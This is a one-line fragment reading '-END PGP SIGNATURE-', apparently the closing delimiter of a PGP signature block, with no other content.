-END PGP SIGNATURE-